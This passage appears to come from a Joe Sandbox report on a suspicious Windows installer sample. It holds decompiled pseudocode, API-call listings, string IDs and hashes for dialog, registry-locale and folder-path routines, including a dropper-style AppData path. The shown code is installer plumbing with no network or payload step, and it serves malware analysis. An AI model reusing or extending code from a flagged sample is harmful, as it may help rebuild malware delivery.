                                                            							SetWindowTextA(_t125, 0x43c090); // executed
                                                            							_push(_t134);
                                                            							_t65 = E00401389( *((intOrPtr*)(_t131 + 8)));
                                                            							__eflags = _t65;
                                                            							if(_t65 != 0) {
                                                            								continue;
                                                            							} else {
                                                            								__eflags =  *_t131 - _t134;
                                                            								if( *_t131 == _t134) {
                                                            									continue;
                                                            								}
                                                            								__eflags =  *(_t131 + 4) - 5;
                                                            								if( *(_t131 + 4) != 5) {
                                                            									DestroyWindow( *0x44e3f8); // executed
                                                            									 *0x438068 = _t131;
                                                            									__eflags =  *_t131 - _t134;
                                                            									if( *_t131 <= _t134) {
                                                            										goto L60;
                                                            									}
                                                            									_t71 = CreateDialogParamA( *0x452420,  *_t131 +  *0x44e400 & 0x0000ffff, _t125,  *( *(_t131 + 4) * 4 + "?D@"), _t131); // executed
                                                            									__eflags = _t71 - _t134;
                                                            									 *0x44e3f8 = _t71;
                                                            									if(_t71 == _t134) {
                                                            										goto L60;
                                                            									}
                                                            									_push( *((intOrPtr*)(_t131 + 0x2c)));
                                                            									_push(6);
                                                            									E004042D4(_t71);
                                                            									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t135 + 0x10);
                                                            									ScreenToClient(_t125, _t135 + 0x10);
                                                            									SetWindowPos( *0x44e3f8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
                                                            									_push(_t134);
                                                            									E00401389( *((intOrPtr*)(_t131 + 0xc)));
                                                            									__eflags =  *0x44e3ec - _t134;
                                                            									if( *0x44e3ec != _t134) {
                                                            										goto L63;
                                                            									}
                                                            									ShowWindow( *0x44e3f8, 8); // executed
                                                            									E00404320(0x405);
                                                            									goto L60;
                                                            								}
                                                            								__eflags =  *0x4524ac - _t134;
                                                            								if( *0x4524ac != _t134) {
                                                            									goto L63;
                                                            								}
                                                            								__eflags =  *0x4524a0 - _t134;
                                                            								if( *0x4524a0 != _t134) {
                                                            									continue;
                                                            								}
                                                            								goto L63;
                                                            							}
                                                            						}
                                                            						DestroyWindow( *0x44e3f8);
                                                            						 *0x452428 = _t134;
                                                            						EndDialog(_t125,  *0x436060);
                                                            						goto L60;
                                                            					} else {
                                                            						__eflags = _t32 - 1;
                                                            						if(_t32 != 1) {
                                                            							L35:
                                                            							__eflags =  *_t131 - _t134;
                                                            							if( *_t131 == _t134) {
                                                            								goto L63;
                                                            							}
                                                            							goto L36;
                                                            						}
                                                            						_push(0);
                                                            						_t84 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
                                                            						__eflags = _t84;
                                                            						if(_t84 == 0) {
                                                            							goto L35;
                                                            						}
                                                            						SendMessageA( *0x44e3f8, 0x40f, 0, 1);
                                                            						__eflags =  *0x44e3ec;
                                                            						return 0 |  *0x44e3ec == 0x00000000;
                                                            					}
                                                            				} else {
                                                            					_t125 = _a4;
                                                            					_t134 = 0;
                                                            					if(_t128 == 0x47) {
                                                            						SetWindowPos( *0x43c070, _t125, 0, 0, 0, 0, 0x13);
                                                            					}
                                                            					_t120 = _a12;
                                                            					if(_t128 != 5) {
                                                            						L8:
                                                            						if(_t128 != 0x40d) {
                                                            							__eflags = _t128 - 0x11;
                                                            							if(_t128 != 0x11) {
                                                            								__eflags = _t128 - 0x111;
                                                            								if(_t128 != 0x111) {
                                                            									goto L28;
                                                            								}
                                                            								_t133 = _t120 & 0x0000ffff;
                                                            								_t126 = GetDlgItem(_t125, _t133);
                                                            								__eflags = _t126 - _t134;
                                                            								if(_t126 == _t134) {
                                                            									L15:
                                                            									__eflags = _t133 - 1;
                                                            									if(_t133 != 1) {
                                                            										__eflags = _t133 - 3;
                                                            										if(_t133 != 3) {
                                                            											_t127 = 2;
                                                            											__eflags = _t133 - _t127;
                                                            											if(_t133 != _t127) {
                                                            												L27:
                                                            												SendMessageA( *0x44e3f8, 0x111, _t120, _a16);
                                                            												goto L28;
                                                            											}
                                                            											__eflags =  *0x4524ac - _t134;
                                                            											if( *0x4524ac == _t134) {
                                                            												_t97 = E0040140B(3);
                                                            												__eflags = _t97;
                                                            												if(_t97 != 0) {
                                                            													goto L28;
                                                            												}
                                                            												 *0x436060 = 1;
                                                            												L23:
                                                            												_push(0x78);
                                                            												L24:
                                                            												E004042AD();
                                                            												goto L28;
                                                            											}
                                                            											E0040140B(_t127);
                                                            											 *0x436060 = _t127;
                                                            											goto L23;
                                                            										}
                                                            										__eflags =  *0x40a1dc - _t134; // 0x0
                                                            										if(__eflags <= 0) {
                                                            											goto L27;
                                                            										}
                                                            										_push(0xffffffff);
                                                            										goto L24;
                                                            									}
                                                            									_push(_t133);
                                                            									goto L24;
                                                            								}
                                                            								SendMessageA(_t126, 0xf3, _t134, _t134);
                                                            								_t101 = IsWindowEnabled(_t126);
                                                            								__eflags = _t101;
                                                            								if(_t101 == 0) {
                                                            									L63:
                                                            									return 0;
                                                            								}
                                                            								goto L15;
                                                            							}
                                                            							SetWindowLongA(_t125, _t134, _t134);
                                                            							return 1;
                                                            						}
                                                            						DestroyWindow( *0x44e3f8);
                                                            						 *0x44e3f8 = _t120;
                                                            						L60:
                                                            						if( *0x444090 == _t134 &&  *0x44e3f8 != _t134) {
                                                            							ShowWindow(_t125, 0xa); // executed
                                                            							 *0x444090 = 1;
                                                            						}
                                                            						goto L63;
                                                            					} else {
                                                            						asm("sbb eax, eax");
                                                            						ShowWindow( *0x43c070,  ~(_t120 - 1) & 0x00000005);
                                                            						if(_t120 != 2 || (GetWindowLongA(_t125, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                            							L28:
                                                            							return E0040433B(_a8, _t120, _a16);
                                                            						} else {
                                                            							ShowWindow(_t125, 4);
                                                            							goto L8;
                                                            						}
                                                            					}
                                                            				}
                                                            			}
































                                                            APIs
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E16
                                                            • ShowWindow.USER32(?), ref: 00403E36
                                                            • GetWindowLongA.USER32(?,000000F0), ref: 00403E48
                                                            • ShowWindow.USER32(?,00000004), ref: 00403E61
                                                            • DestroyWindow.USER32 ref: 00403E75
                                                            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403E8E
                                                            • GetDlgItem.USER32(?,?), ref: 00403EAD
                                                            • SendMessageA.USER32 ref: 00403EC1
                                                            • IsWindowEnabled.USER32(00000000), ref: 00403EC8
                                                            • GetDlgItem.USER32(?,00000001), ref: 00403F73
                                                            • GetDlgItem.USER32(?,00000002), ref: 00403F7D
                                                            • SetClassLongA.USER32(?,000000F2,?), ref: 00403F97
                                                            • SendMessageA.USER32 ref: 00403FE8
                                                            • GetDlgItem.USER32(?,00000003), ref: 0040408E
                                                            • ShowWindow.USER32(00000000,?), ref: 004040AF
                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004040C1
                                                            • EnableWindow.USER32(?,?), ref: 004040DC
                                                            • GetSystemMenu.USER32 ref: 004040F2
                                                            • EnableMenuItem.USER32 ref: 004040F9
                                                            • SendMessageA.USER32 ref: 00404111
                                                            • SendMessageA.USER32 ref: 00404124
                                                            • lstrlenA.KERNEL32(0043C090,?,0043C090,00000000), ref: 0040414E
                                                            • SetWindowTextA.USER32(?,0043C090), ref: 0040415D
                                                            • ShowWindow.USER32(?,0000000A), ref: 00404291
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                            • String ID:
                                                            • API String ID: 121052019-0
                                                            • Opcode ID: b673dabca76274c5076d0e044a6da74a23405ad17572b8bf379c5a70d32c39fe
                                                            • Instruction ID: 1a69bbab5f1dc0e71ac1873d296b8d42e3e712d362af29a70bde279b026b61fc
                                                            • Opcode Fuzzy Hash: b673dabca76274c5076d0e044a6da74a23405ad17572b8bf379c5a70d32c39fe
                                                            • Instruction Fuzzy Hash: 35C1F471900205AFDB216F61EE85E2B3A78FB86749F01053EFA41B21F1CB3898519B2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 302 403a3d-403a55 call 406663 305 403a57-403a67 call 4061b5 302->305 306 403a69-403a9a call 40613e 302->306 315 403abd-403ae6 call 403d02 call 405cd7 305->315 311 403ab2-403ab8 lstrcatA 306->311 312 403a9c-403aad call 40613e 306->312 311->315 312->311 320 403aec-403af1 315->320 321 403b6d-403b75 call 405cd7 315->321 320->321 322 403af3-403b17 call 40613e 320->322 327 403b83-403ba8 LoadImageA 321->327 328 403b77-403b7e call 4062ea 321->328 322->321 329 403b19-403b1b 322->329 331 403c29-403c31 call 40140b 327->331 332 403baa-403bda RegisterClassA 327->332 328->327 333 403b2c-403b38 lstrlenA 329->333 334 403b1d-403b2a call 405c14 329->334 346 403c33-403c36 331->346 347 403c3b-403c46 call 403d02 331->347 335 403be0-403c24 SystemParametersInfoA CreateWindowExA 332->335 336 403cf8 332->336 340 403b60-403b68 call 405be9 call 406257 333->340 341 403b3a-403b48 lstrcmpiA 333->341 334->333 335->331 339 403cfa-403d01 336->339 340->321 341->340 345 403b4a-403b54 GetFileAttributesA 341->345 350 403b56-403b58 345->350 351 403b5a-403b5b call 405c30 345->351 346->339 355 403c4c-403c66 ShowWindow call 4065f5 347->355 356 403ccf-403cd0 call 40544a 347->356 350->340 350->351 351->340 363 403c72-403c84 GetClassInfoA 355->363 364 403c68-403c6d call 4065f5 355->364 359 403cd5-403cd7 356->359 361 403cf1-403cf3 call 40140b 359->361 362 403cd9-403cdf 359->362 361->336 362->346 365 403ce5-403cec call 40140b 362->365 368 403c86-403c96 GetClassInfoA RegisterClassA 363->368 369 403c9c-403cbf DialogBoxParamA call 40140b 363->369 364->363 365->346 368->369 373 403cc4-403ccd call 40398d 369->373 373->339
                                                            C-Code - Quality: 96%
                                                            			E00403A3D(void* __eflags) {
                                                            				intOrPtr _v4;
                                                            				intOrPtr _v8;
                                                            				int _v12;
                                                            				void _v16;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				intOrPtr* _t17;
                                                            				void* _t25;
                                                            				void* _t27;
                                                            				int _t28;
                                                            				void* _t31;
                                                            				int _t34;
                                                            				int _t35;
                                                            				int _t39;
                                                            				char _t57;
                                                            				CHAR* _t59;
                                                            				signed char _t63;
                                                            				CHAR* _t74;
                                                            				intOrPtr _t76;
                                                            				CHAR* _t81;
                                                            
                                                            				_t76 =  *0x452430;
                                                            				_t17 = E00406663(2);
                                                            				_t84 = _t17;
                                                            				if(_t17 == 0) {
                                                            					_t74 = 0x43c090;
                                                            					 *0x483000 = 0x30;
                                                            					 *0x483001 = 0x78;
                                                            					 *0x483002 = 0;
                                                            					E0040613E(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x43c090, 0);
                                                            					__eflags =  *0x43c090;
                                                            					if(__eflags == 0) {
                                                            						E0040613E(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x43c090, 0);
                                                            					}
                                                            					lstrcatA(0x483000, _t74);
                                                            				} else {
                                                            					E004061B5(0x483000,  *_t17() & 0x0000ffff);
                                                            				}
                                                            				E00403D02(_t71, _t84);
                                                            				_t80 = "C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes";
                                                            				 *0x4524a0 =  *0x452438 & 0x00000020;
                                                            				 *0x4524bc = 0x10000;
                                                            				if(E00405CD7(_t84, "C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes") != 0) {
                                                            					L16:
                                                            					if(E00405CD7(_t92, _t80) == 0) {
                                                            						E004062EA(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118))); // executed
                                                            					}
                                                            					_t25 = LoadImageA( *0x452420, 0x67, 1, 0, 0, 0x8040);
                                                            					 *0x44e408 = _t25;
                                                            					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
                                                            						L21:
                                                            						if(E0040140B(0) == 0) {
                                                            							_t27 = E00403D02(_t71, __eflags);
                                                            							__eflags =  *0x4524c0;
                                                            							if( *0x4524c0 != 0) {
                                                            								_t28 = E0040544A(_t27, 0);
                                                            								__eflags = _t28;
                                                            								if(_t28 == 0) {
                                                            									E0040140B(1);
                                                            									goto L33;
                                                            								}
                                                            								__eflags =  *0x44e3ec;
                                                            								if( *0x44e3ec == 0) {
                                                            									E0040140B(2);
                                                            								}
                                                            								goto L22;
                                                            							}
                                                            							ShowWindow( *0x43c070, 5); // executed
                                                            							_t34 = E004065F5("RichEd20"); // executed
                                                            							__eflags = _t34;
                                                            							if(_t34 == 0) {
                                                            								E004065F5("RichEd32");
                                                            							}
                                                            							_t81 = "RichEdit20A";
                                                            							_t35 = GetClassInfoA(0, _t81, 0x44e3c0);
                                                            							__eflags = _t35;
                                                            							if(_t35 == 0) {
                                                            								GetClassInfoA(0, "RichEdit", 0x44e3c0);
                                                            								 *0x44e3e4 = _t81;
                                                            								RegisterClassA(0x44e3c0);
                                                            							}
                                                            							_t39 = DialogBoxParamA( *0x452420,  *0x44e400 + 0x00000069 & 0x0000ffff, 0, E00403DDA, 0); // executed
                                                            							E0040398D(E0040140B(5), 1);
                                                            							return _t39;
                                                            						}
                                                            						L22:
                                                            						_t31 = 2;
                                                            						return _t31;
                                                            					} else {
                                                            						_t71 =  *0x452420;
                                                            						 *0x44e3c4 = E00401000;
                                                            						 *0x44e3d0 =  *0x452420;
                                                            						 *0x44e3d4 = _t25;
                                                            						 *0x44e3e4 = 0x40a1f4;
                                                            						if(RegisterClassA(0x44e3c0) == 0) {
                                                            							L33:
                                                            							__eflags = 0;
                                                            							return 0;
                                                            						}
                                                            						SystemParametersInfoA(0x30, 0,  &_v16, 0);
                                                            						 *0x43c070 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x452420, 0);
                                                            						goto L21;
                                                            					}
                                                            				} else {
                                                            					_t71 =  *(_t76 + 0x48);
                                                            					_t86 = _t71;
                                                            					if(_t71 == 0) {
                                                            						goto L16;
                                                            					}
                                                            					_t74 = 0x44a3c0;
                                                            					E0040613E(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x452458, 0x44a3c0, 0);
                                                            					_t57 =  *0x44a3c0; // 0x43
                                                            					if(_t57 == 0) {
                                                            						goto L16;
                                                            					}
                                                            					if(_t57 == 0x22) {
                                                            						_t74 = 0x44a3c1;
                                                            						 *((char*)(E00405C14(0x44a3c1, 0x22))) = 0;
                                                            					}
                                                            					_t59 = lstrlenA(_t74) + _t74 - 4;
                                                            					if(_t59 <= _t74 || lstrcmpiA(_t59, ".exe") != 0) { // ".exe" taken from the lstrcmpiA call logged at ref 00403B40
                                                            						L15:
                                                            						E00406257(_t80, E00405BE9(_t74));
                                                            						goto L16;
                                                            					} else {
                                                            						_t63 = GetFileAttributesA(_t74);
                                                            						if(_t63 == 0xffffffff) {
                                                            							L14:
                                                            							E00405C30(_t74);
                                                            							goto L15;
                                                            						}
                                                            						_t92 = _t63 & 0x00000010;
                                                            						if((_t63 & 0x00000010) != 0) {
                                                            							goto L15;
                                                            						}
                                                            						goto L14;
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                              • Part of subcall function 00406663: GetModuleHandleA.KERNEL32(?,00000000,?,004034F5,0000000B), ref: 00406675
                                                              • Part of subcall function 00406663: GetProcAddress.KERNEL32(00000000,?), ref: 00406690
                                                            • lstrcatA.KERNEL32(00483000,0043C090,80000001,Control Panel\Desktop\ResourceLocale,00000000,0043C090,00000000,00000002,75572754,00485000,?,0047B000,00000009,0000000B), ref: 00403AB8
                                                            • lstrlenA.KERNEL32(Copy failed,?,?,?,Copy failed,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes,00483000,0043C090,80000001,Control Panel\Desktop\ResourceLocale,00000000,0043C090,00000000,00000002,75572754), ref: 00403B2D
                                                            • lstrcmpiA.KERNEL32(?,.exe,Copy failed,?,?,?,Copy failed,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes,00483000,0043C090,80000001,Control Panel\Desktop\ResourceLocale,00000000,0043C090,00000000), ref: 00403B40
                                                            • GetFileAttributesA.KERNEL32(Copy failed,?,0047B000,00000009,0000000B), ref: 00403B4B
                                                            • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes), ref: 00403B94
                                                              • Part of subcall function 004061B5: wsprintfA.USER32 ref: 004061C2
                                                            • RegisterClassA.USER32(0044E3C0), ref: 00403BD1
                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403BE9
                                                            • CreateWindowExA.USER32 ref: 00403C1E
                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403C54
                                                            • GetClassInfoA.USER32(00000000,RichEdit20A,0044E3C0), ref: 00403C80
                                                            • GetClassInfoA.USER32(00000000,RichEdit,0044E3C0), ref: 00403C8D
                                                            • RegisterClassA.USER32(0044E3C0), ref: 00403C96
                                                            • DialogBoxParamA.USER32 ref: 00403CB5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                            • String ID: .DEFAULT\Control Panel\International$.exe$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes$Control Panel\Desktop\ResourceLocale$Copy failed$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                            • API String ID: 1975747703-1132855158
                                                            • Opcode ID: 95bf514c9ea4fc9c592dd570d8c938eb6a532796c2675ae0dce3c92584506eb1
                                                            • Instruction ID: 9ed41b13b3066df8ef4fe5e21b3ba9d2433b63f5b2cc2a01767d3bc771330ebd
                                                            • Opcode Fuzzy Hash: 95bf514c9ea4fc9c592dd570d8c938eb6a532796c2675ae0dce3c92584506eb1
                                                            • Instruction Fuzzy Hash: A261B375644344AEE611AF669E45F3B3A6CEB4670EF00043FF941B62E3CA7C99019B2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            [Control-flow graph for function 004062EA (legend: executed / not executed); graph not reproduced.]
                                                            C-Code - Quality: 72%
                                                            			E004062EA(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                            				struct _ITEMIDLIST* _v8;
                                                            				char _v12;
                                                            				signed int _v16;
                                                            				signed char _v20;
                                                            				signed int _v24;
                                                            				signed char _v28;
                                                            				signed int _t36;
                                                            				CHAR* _t37;
                                                            				signed int _t39;
                                                            				char _t50;
                                                            				char _t52;
                                                            				char _t54;
                                                            				void* _t62;
                                                            				char* _t63;
                                                            				signed int _t77;
                                                            				char _t85;
                                                            				void* _t86;
                                                            				CHAR* _t87;
                                                            				void* _t89;
                                                            				signed int _t94;
                                                            				signed int _t96;
                                                            				void* _t97;
                                                            
                                                            				_t89 = __esi;
                                                            				_t86 = __edi;
                                                            				_t62 = __ebx;
                                                            				_t36 = _a8;
                                                            				if(_t36 < 0) {
                                                            					_t36 =  *( *0x44e3fc - 4 + _t36 * 4);
                                                            				}
                                                            				_push(_t62);
                                                            				_push(_t89);
                                                            				_push(_t86);
                                                            				_t63 = _t36 +  *0x452458;
                                                            				_t37 = 0x44a3c0;
                                                            				_t87 = 0x44a3c0;
                                                            				if(_a4 >= 0x44a3c0 && _a4 - 0x44a3c0 < 0x4000) {
                                                            					_t87 = _a4;
                                                            					_a4 = _a4 & 0x00000000;
                                                            				}
                                                            				while(1) {
                                                            					_t85 =  *_t63;
                                                            					if(_t85 == 0) {
                                                            						break;
                                                            					}
                                                            					__eflags = _t87 - _t37 - 0x2000;
                                                            					if(_t87 - _t37 >= 0x2000) {
                                                            						break;
                                                            					}
                                                            					_t63 = _t63 + 1;
                                                            					__eflags = _t85 - 4;
                                                            					_a8 = _t63;
                                                            					if(__eflags >= 0) {
                                                            						if(__eflags != 0) {
                                                            							 *_t87 = _t85;
                                                            							_t87 =  &(_t87[1]);
                                                            							__eflags = _t87;
                                                            						} else {
                                                            							 *_t87 =  *_t63;
                                                            							_t87 =  &(_t87[1]);
                                                            							_t63 = _t63 + 1;
                                                            						}
                                                            						continue;
                                                            					}
                                                            					_t39 =  *((char*)(_t63 + 1));
                                                            					_t77 =  *_t63;
                                                            					_t94 = (_t39 & 0x0000007f) << 0x00000007 | _t77 & 0x0000007f;
                                                            					_v24 = _t77;
                                                            					_v28 = _t77 | 0x00000080;
                                                            					_v16 = _t39;
                                                            					_v20 = _t39 | 0x00000080;
                                                            					_t63 = _a8 + 2;
                                                            					__eflags = _t85 - 2;
                                                            					if(_t85 != 2) {
                                                            						__eflags = _t85 - 3;
                                                            						if(_t85 != 3) {
                                                            							__eflags = _t85 - 1;
                                                            							if(_t85 == 1) {
                                                            								__eflags = (_t39 | 0xffffffff) - _t94;
                                                            								E004062EA(_t63, _t87, _t94, _t87, (_t39 | 0xffffffff) - _t94);
                                                            							}
                                                            							L42:
                                                            							_t87 =  &(_t87[lstrlenA(_t87)]);
                                                            							_t37 = 0x44a3c0;
                                                            							continue;
                                                            						}
                                                            						__eflags = _t94 - 0x1d;
                                                            						if(_t94 != 0x1d) {
                                                            							__eflags = (_t94 << 0xd) + 0x453000;
                                                            							E00406257(_t87, (_t94 << 0xd) + 0x453000);
                                                            						} else {
                                                            							E004061B5(_t87,  *0x452428);
                                                            						}
                                                            						__eflags = _t94 + 0xffffffeb - 7;
                                                            						if(_t94 + 0xffffffeb < 7) {
                                                            							L33:
                                                            							E00406535(_t87);
                                                            						}
                                                            						goto L42;
                                                            					}
                                                            					__eflags =  *0x4524dc;
                                                            					_t96 = 2;
                                                            					if( *0x4524dc != 0) {
                                                            						L13:
                                                            						_a8 = 1;
                                                            						L14:
                                                            						__eflags =  *0x4524a4;
                                                            						if( *0x4524a4 != 0) {
                                                            							_t96 = 4;
                                                            						}
                                                            						__eflags = _t77;
                                                            						if(__eflags >= 0) {
                                                            							__eflags = _t77 - 0x25;
                                                            							if(_t77 != 0x25) {
                                                            								__eflags = _t77 - 0x24;
                                                            								if(_t77 == 0x24) {
                                                            									GetWindowsDirectoryA(_t87, 0x2000);
                                                            									_t96 = 0;
                                                            								}
                                                            								while(1) {
                                                            									__eflags = _t96;
                                                            									if(_t96 == 0) {
                                                            										goto L30;
                                                            									}
                                                            									_t50 =  *0x452424;
                                                            									_t96 = _t96 - 1;
                                                            									__eflags = _t50;
                                                            									if(_t50 == 0) {
                                                            										L26:
                                                            										_t52 = SHGetSpecialFolderLocation( *0x452428,  *(_t97 + _t96 * 4 - 0x18),  &_v8);
                                                            										__eflags = _t52;
                                                            										if(_t52 != 0) {
                                                            											L28:
                                                            											 *_t87 =  *_t87 & 0x00000000;
                                                            											__eflags =  *_t87;
                                                            											continue;
                                                            										}
                                                            										__imp__SHGetPathFromIDListA(_v8, _t87);
                                                            										_v12 = _t52;
                                                            										__imp__CoTaskMemFree(_v8);
                                                            										__eflags = _v12;
                                                            										if(_v12 != 0) {
                                                            											goto L30;
                                                            										}
                                                            										goto L28;
                                                            									}
                                                            									__eflags = _a8;
                                                            									if(_a8 == 0) {
                                                            										goto L26;
                                                            									}
                                                            									_t54 =  *_t50( *0x452428,  *(_t97 + _t96 * 4 - 0x18), 0, 0, _t87); // executed
                                                            									__eflags = _t54;
                                                            									if(_t54 == 0) {
                                                            										goto L30;
                                                            									}
                                                            									goto L26;
                                                            								}
                                                            								goto L30;
                                                            							}
                                                            							GetSystemDirectoryA(_t87, 0x2000);
                                                            							goto L30;
                                                            						} else {
                                                            							E0040613E((_t77 & 0x0000003f) +  *0x452458, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t77 & 0x0000003f) +  *0x452458, _t87, _t77 & 0x00000040);
                                                            							__eflags =  *_t87;
                                                            							if( *_t87 != 0) {
                                                            								L31:
                                                            								__eflags = _v16 - 0x1a;
                                                            								if(_v16 == 0x1a) {
                                                            									lstrcatA(_t87, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                            								}
                                                            								goto L33;
                                                            							}
                                                            							E004062EA(_t63, _t87, _t96, _t87, _v16);
                                                            							L30:
                                                            							__eflags =  *_t87;
                                                            							if( *_t87 == 0) {
                                                            								goto L33;
                                                            							}
                                                            							goto L31;
                                                            						}
                                                            					}
                                                            					__eflags =  *0x4524de - 0x45a;
                                                            					if( *0x4524de >= 0x45a) {
                                                            						goto L13;
                                                            					}
                                                            					__eflags = _t39 - 0x23;
                                                            					if(_t39 == 0x23) {
                                                            						goto L13;
                                                            					}
                                                            					__eflags = _t39 - 0x2e;
                                                            					if(_t39 == 0x2e) {
                                                            						goto L13;
                                                            					} else {
                                                            						_a8 = _a8 & 0x00000000;
                                                            						goto L14;
                                                            					}
                                                            				}
                                                            				 *_t87 =  *_t87 & 0x00000000;
                                                            				if(_a4 == 0) {
                                                            					return _t37;
                                                            				}
                                                            				return E00406257(_a4, _t37);
                                                            			}

























                                                            0x00000000
                                                            0x00406490
                                                            0x00406418
                                                            0x00000000
                                                            0x004063d6
                                                            0x004063f1
                                                            0x004063f6
                                                            0x004063f9
                                                            0x00406499
                                                            0x00406499
                                                            0x0040649d
                                                            0x004064a5
                                                            0x004064a5
                                                            0x00000000
                                                            0x0040649d
                                                            0x00406403
                                                            0x00406494
                                                            0x00406494
                                                            0x00406497
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406497
                                                            0x004063d4
                                                            0x004063a4
                                                            0x004063ad
                                                            0x00000000
                                                            0x00000000
                                                            0x004063af
                                                            0x004063b2
                                                            0x00000000
                                                            0x00000000
                                                            0x004063b4
                                                            0x004063b7
                                                            0x00000000
                                                            0x004063b9
                                                            0x004063b9
                                                            0x00000000
                                                            0x004063b9
                                                            0x004063b7
                                                            0x0040651c
                                                            0x00406526
                                                            0x00406532
                                                            0x00406532
                                                            0x00000000

                                                            APIs
                                                            • GetSystemDirectoryA.KERNEL32(Copy failed,00002000), ref: 00406418
                                                            • GetWindowsDirectoryA.KERNEL32(Copy failed,00002000,?,Copy failed,00000000,004053B0,Copy failed,00000000), ref: 0040642B
                                                            • SHGetSpecialFolderLocation.SHELL32(004053B0,7555110C,?), ref: 00406467
                                                            • SHGetPathFromIDListA.SHELL32(7555110C,Copy failed), ref: 00406475
                                                            • CoTaskMemFree.OLE32(7555110C), ref: 00406481
                                                            • lstrcatA.KERNEL32(Copy failed,\Microsoft\Internet Explorer\Quick Launch), ref: 004064A5
                                                            • lstrlenA.KERNEL32(Copy failed,?,Copy failed,00000000,004053B0,Copy failed,00000000,00000000,0042CE48,7555110C), ref: 004064F7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                            • String ID: Copy failed$Copy failed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                            • API String ID: 717251189-2821452881
                                                            • Opcode ID: 838a228d43f25cac2ee0c0fa74933bf62ea0f71a5a7e27bbbeaab37106ce29fc
                                                            • Instruction ID: ebe98ae1178673def3e02426a949122db7229e586474bd24546af65fb667a20e
                                                            • Opcode Fuzzy Hash: 838a228d43f25cac2ee0c0fa74933bf62ea0f71a5a7e27bbbeaab37106ce29fc
                                                            • Instruction Fuzzy Hash: D5611571900204AFEF219F24DD94B7E3BA4AB06714F12403FE943BA2D2D67C89A1DB5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
                                                            C-Code - Quality: 78%
                                                            			E00402F0C(void* __eflags, signed int _a4) {
                                                            				DWORD* _v8;
                                                            				DWORD* _v12;
                                                            				void* _v16;
                                                            				intOrPtr _v20;
                                                            				long _v24;
                                                            				intOrPtr _v28;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v36;
                                                            				intOrPtr _v40;
                                                            				signed int _v44;
                                                            				long _t50;
                                                            				void* _t57;
                                                            				intOrPtr* _t59;
                                                            				long _t60;
                                                            				long _t70;
                                                            				signed int _t77;
                                                            				intOrPtr _t80;
                                                            				long _t82;
                                                            				void* _t85;
                                                            				signed int _t87;
                                                            				void* _t89;
                                                            				long _t90;
                                                            				long _t93;
                                                            				intOrPtr* _t94;
                                                            
                                                            				_t82 = 0;
                                                            				_v12 = 0;
                                                            				_v8 = 0;
                                                            				 *0x45242c = GetTickCount() + 0x3e8;
                                                            				GetModuleFileNameA(0, 0x489000, 0x2000);
                                                            				_t89 = E00405DEA(0x489000, 0x80000000, 3);
                                                            				_v16 = _t89;
